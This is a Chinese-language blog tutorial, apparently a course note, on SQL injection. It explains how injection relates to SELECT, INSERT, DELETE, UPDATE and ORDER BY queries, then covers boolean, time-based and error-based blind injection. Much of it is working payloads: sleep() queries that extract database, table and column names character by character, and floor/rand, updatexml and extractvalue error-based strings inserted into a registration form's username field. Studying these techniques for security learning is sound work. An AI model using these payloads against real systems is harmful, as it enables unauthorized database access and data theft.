WBE漏洞-SQL注入之报错盲注

最新推荐文章于 2022-07-03 16:24:52 发布
最新推荐文章于 2022-07-03 16:24:52 发布
阅读量412 收藏 1
点赞数 2
分类专栏: WEB安全-SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45441315/article/details/119238028
版权

WBE漏洞-SQL注入之查询方式及报错盲注

前言

当进行SQL注入时,有很多注入会出现无回显的情况,其中不回显的原因可能是SQL语句查询方式的问题导致,这个时候我们需要用到相关的报错或盲注进行后续操作,同时作为手工注入时,提前了解或预知其SQL语句大概写法也能更好地选择对应的注入语句。

在这里插入图片描述

涉及知识点

select 查询数据
在网站应用中进行数据显示查询效果
例: select * from news wher id=$id

insert 插入数据
在网站应用中进行用户注册添加等操作
例:insert into news(id,url,text) values(2,‘x’,’$t’)

delete 删除数据
后台管理里面删除文章删除用户等操作
例:delete from news where id=$id

update 更新数据
会员或后台中心数据同步或缓存等操作
例:update user set pwd=’$p’ where id=2 and username=‘admin’

order by 排列数据
一般结合表名或列名进行数据排序操作
例:select * from news order by $id
例:select id,name,price from news order by $order

重点理解:
我们可以通过以上查询方式与网站应用的关系去猜测注入点产生地方或应用猜测到对方的SQL查询方式。

新知识点:
xpath报错注入(extractvalue和updatexml)
floor()知识

like ‘ro%’ #判断ro或ro…是否成立
like ‘ro_’ #判断ro+一个字符是否成立
regexp ‘[1-z]’ #匹配xiaodi及xiaodi…等
MySQL REGEXP:正则表达式查询
if(条件,5,0) #条件成立,返回5,反之,返回0
sleep(5) #SQL语句延时执行5秒
mid(a,b,c) #从位置B开始,截取a字符串的c位,c可选,默认剩下
substr(a,b,c) #从位置B开始,截取a字符串的c位
在这里插入图片描述
在这里插入图片描述
left(database(),1) #left(a,b)从左侧截取a的前b位
length(database())=8 #判断数据库database()名的长度ascii(x)=97 #判断x的ascii码是否等于97
在这里插入图片描述

SQL注入报错盲注

盲注就是在注入过程中,获取的数据不能回显至前端页面。此时,我们需要利用一些方法进行半段或者尝试,这个过程称之为盲注。我们可以知道盲注分为以下三类:

基于布尔的SQL盲注-逻辑判断

(不需要回显信息就能看到)(2)
regexp,like,ascii或ord,left,,mid

基于时间的SQL盲注-延时判断

(不需要回显信息就能看到)(3)
通过延迟进而加载页面判断猜想是否正确
sleep()延时函数
在这里插入图片描述

if(a,b,c)条件判断函数
在这里插入图片描述
在这里插入图片描述
注入步骤
先用length(database())判断当前数据库长度
在这里插入图片描述
可以用bp进行参数爆破

猜数据库名字

select if(database() like 'p%',sleep(5),0) from member limit 0,1;

在这里插入图片描述
要加limit 0,1噢,不能的话他会一个个数据去比对的

或用substr函数

select if(substr(database(),1,1)='p',sleep(5),0) from member limit 0,1;

在这里插入图片描述
再加个ascii函数,因为工具的暴力破解的参数都是基于数据的,所以用数字来判断会好些

select if(ascii(substr(database(),1,1))=112,sleep(5),0) from member limit 0,1;

在这里插入图片描述
注意,可以用二分法进行比对,利用>符号判断ascii,大于的话说明比112大,范围在112-255之间,小于的话说明比112小,范围在0-112之间
找数据库名字的第二个字符

select if(ascii(substr(database(),2,1))=105,sleep(5),0) from member limit 0,1;

在这里插入图片描述
以此类推,找出数据库完整名字

找表

select if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=104,sleep(5),0) from member limit 0,1;

在这里插入图片描述
更改substr(1,1)为substr(1,2)继续找第一个数据表名字的第二个字符
更改limit 0,1为limit1,1继续找第二个数据库表

属性列

select if(ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),1,1))=105,sleep(5),0) from member limit 0,1;

在这里插入图片描述

其实以上手工是很难注入的,因为情况实在是太多了,可以进行半手动半工具进行爆破,也可以直接使用sqlmap工具进行爆破

and if(ascii(substr(database(),1,1))=115,sleep(5),1)–+
and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101,sleep(3),0)–+

if,sleep

基于报错的SQL盲注-报错回显

(优先于选择:1)

floor

1

username=x' or(select 1 from(select count(*),concat((select(select (select concat(0x7e,database(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)  or '
&password=xiaodi&sex=%E7%94%B7&phonenum=13878787788&email=wuhan&add=hubei&submit=submit

2

username=x' and(select 1 from(select count(*),concat((select(select (select concat(0x7e,database(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)  and '
&password=xiaodi&sex=%E7%94%B7&phonenum=13878787788&email=wuhan&add=hubei&submit=submit

有可能会出现如下错误可用第二种payload

Truncated incorrect DOUBLE value: 'x'

核心payload

select 1 from(select count(*),concat((select(select (select concat(0x7e,database(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))b from information_schema.tables group by x)a

需更换地方只有database(),其他为固定格式
逐一拆解代码

floor(rand(0)*2)

concat(0x7e,database(),0x7e)

count(*)

concat((select(select (select concat(0x7e,database(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))b

临时表a

select count(*),concat((select(select (select concat(0x7e,database(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))b from information_schema.tables group by x

注意:select(concat0x7e,database(),0x7e)将返回的消息用~标注,方便查看,也是为了开发工具能够一下识别出来,直接select database()也是可以的

updatexml

username=x ’ or updatexml(1,concat(0x7e,(version())),0) or ’ &password=xiaodi&sex=%E7%94%B7&phonenum=13878787788&email=wuhan&add=hubei&submit=submit

extractvalue

username=x ’ or extractvalue(1,concat(0x7e,database())),0) or ’ &password=xiaodi&sex=%E7%94%B7&phonenum=13878787788&email=wuhan&add=hubei&submit=submit

硫酸超
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WEB漏洞-SQL注入之查询方式及报错盲注
weixin_46425310的博客
06-12 223
WEB漏洞-SQL注入之查询方式及报错盲注 当进行SQL注入时,常常会遇到无回显的情况,不回显可能是因为SQL语句的查询方式的问题,这时候需要用到报错盲注进行后续操作,在手工注入时,最好提前预知SQL语句的写法。 查询方式:增删查改 INSERT SELECT DELETE UPDATE 盲注分为以下三类: 布尔盲注-逻辑判断 ?id=1’+and+left((select+database()),2)=‘se’–+ 时间盲注-延时判断 if,sleep mid(a,b,c) 从位置b开始,截取a字符串的
B站小迪安全笔记第十六天-SQL注入之查询方式及报错盲注
m0_61530426的博客
07-29 550
B站小迪安全笔记
SQL注入之查询方式及报错盲注
m0_48907714的博客
04-02 4318
查询方式及报错盲注 注入无回显,可能是SQL语句查询方式的问题造成,这时我们需要用到相关的报错或者盲注进行后续操作 select 查询数据 select * from new where id=$id insert 插入数据 instert into news(id,url,text) valuse (2,‘x’,’$t’) delete 删除数据 delete from news where id=$id update更新数据 update user set pwd=’$p’ where
第16篇:WEB漏洞~SQL注入~查询方式及报错盲注
廖一语山的博客
07-03 375
目录   当进行SQL注入时,有很多注入会出现无回显的情况,其中不回显的原因可能是SQL语句查询方式的问题导致的,这个时候我们需要用相关的报错盲注进行后续操作,同时作为手工注入时,提前了解或预知其SQL语句大概写法也能更好的选择对应的注入语句。 ..........................................
sql盲注----构造payload 让信息通过错误提示回显出来
weixin_42350229的博客
01-15 920
基于报错的sql盲注----构造payload 让信息通过错误提示回显出来 select 1, count(*), concat(0x3a,0x3a,(select user()),0x3a,0x3a,floot(rand(0)*2))a jfrom information_schema.columns group by a; //explain:此处有三个点,一是需要 concat 计数,二是...
风行WBE服务器易语言源码-易语言
06-13
任何网络服务器都需要考虑安全性问题,如防止DDoS攻击、XSS跨站脚本攻击、SQL注入等。源码中可能包含了安全相关的措施,如输入验证、错误处理和日志记录。 8. 性能优化: 高性能服务器需要处理大量并发连接,因此...
WBE测试功能点
12-23
等,看系统是否能正确处理,尤其是% ' " 这些可能导致SQL注入的字符。 8. **中文字符处理**:在允许输入中英文的系统中输入中文,确保无乱码问题。 9. **信息完整性检查**:确认更新或查看的信息与输入的一致,...
易语言风行WBE服务器
08-19
风行WBE服务器易语言源码系统结构:监听服务,字符替换,获取内容,界面初始化,获取配置, ======窗口程序集1 || ||------_启动按钮_被单击 || ||------监听服务 || ||------字符替换 || ||------获取内容
通过废水监测控制COVID-19大流行
06-02
废水样品中SARS-CoV-2检测/定量的主要挑战之一是缺少优化和标准化的方案。 目前对废水在SARS-CoV-2传播中可能做出的贡献的理解受到废水中存在,持久性和消除的知识差距的限制。 迫切需要进行进一步的研究来确定废水...
易语言源码风行WBE服务器易语言源码.rar
02-23
易语言源码风行WBE服务器易语言源码.rar 易语言源码风行WBE服务器易语言源码.rar 易语言源码风行WBE服务器易语言源码.rar 易语言源码风行WBE服务器易语言源码.rar 易语言源码风行WBE服务器易语言源码.rar ...
WBE服务器 局域网网站使用效果很好
12-07
感觉很不错,好用。局域网网站使用效果很好
C#wbe服务获取天气预报
07-01
在本文中,我们将深入探讨如何使用C#编程语言来创建一个Web服务,该服务能够获取并展示天气预报信息。C#是一种广泛应用于Windows平台、Web应用程序以及游戏开发的强大语言,而Web服务则允许不同系统之间通过网络交换...
库::package:前端javascript库mono-repo
02-04
:package: 图书馆 库是React和Vanilla JS软件包的前端javascript单存储库。... import ResponsiveImage from "@wbe/react-responsive-image" ; 安装库standelone软件包 所有模块都导入一个包。 $ npm
华为H13-821 V2.0 题库.txt
06-03
F2e/widle-taobao-rax/page-detail?wh_weex=true&wx_navbar_transparent=true&id=597714370650&ut_sk=1.Wbe6sO3p/w8DAN4dQh5YL0nk_12431167_1591162887541.Copy.detail.597714370650.925356621&forceFlush=1
java全栈工程师-java io
08-17
本文档主要讲述java IO
(16)【SQL盲注】基础函数、报错回显、延时判断、逻辑判断盲注
02-25 1987
适合新手看的盲注
基于报错的布尔盲注
qq_37301470的博客
11-12 605
基于报错的布尔盲注 条件: 只输出对错但不输出报错内容 函数 exp与cot exp(int) 自然对数的次方 cot(int) 余切值 select if((sql语句),exp(99999999),0) 根据是否报错来确定(sql语句)表达式的对错 通过一位一位判断来爆出结果 属于布尔盲注范畴 过滤 过滤 单引号 逃逸出攻击语句 php语句 sql=select * form users where username='$POST["name"]' and password ='$_POST["pwd
WBE漏洞-SQL注入之查询方式及报错盲注
Rnan_prince的博客
07-06 305
当进行SQL注入时,有很多注入会出现无回显的情况,其中不回显的原因可能是SQL语句查询方式的问题导致,这个时候我们需要用到相关的报错盲注进行后续操作,同时作为手工注入时,提前了解或预知其SQL语句大概写法也能更好地选择对应的注入语句。 涉及知识点: select 查询数据 在网站应用中进行数据显示查询效果 例: select * from news wher id=$id insert 插入数据 在网站应用中进行用户注册添加等操作 例:insert into news(id,ur
sql盲注 解决_SQL 盲注漏洞
weixin_39943992的博客
12-19 1149
原文来自:PORTSWIGGER WEB SECURITY >> Web Security Academy>>SQL injection >>Blind SQL injection翻译完毕...本部分,我们将描述什么是 SQL 盲注漏洞,并解释发现和利用 SQL 盲注漏洞的多种技术。什么是 SQL 盲注?当应用程序容易收到 SQL 注入,但其 HTTP 响应不包...
ensp 交换机配置wbe
最新发布
10-10
以下是在 ensp 交换机上配置 web 界面的步骤: 1. 连接 ensp 交换机并登录到 CLI 交互界面。 2. 输入 system-view 进入系统视图。 3. 输入 http server enable 启用 web 服务器。 4. 输入 http server access-address { ip-address | vlan vlan-id } 命令指定 web 服务器的 IP 地址或 VLAN ID。 5. 输入 http secure-server enable 开启 HTTPS 安全访问。 6. 输入 user-interface vty 0 4 进入虚拟终端视图。 7. 输入 protocol inbound ssh/http/https 允许 SSH 或 HTTP 或 HTTPS 访问。 8. 输入 quit 返回到系统视图。 9. 输入 aaa 启用 AAA 认证。 10. 输入 local-user admin password irreversible-cipher 密码 设置管理员账户和密码。 11. 输入 local-user admin service-type http/https 允许管理员账户通过 HTTP 或 HTTPS 访问系统。 12. 配置完成后,可以在浏览器中输入 ensp 交换机的 IP 地址或者域名来访问 web 界面。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值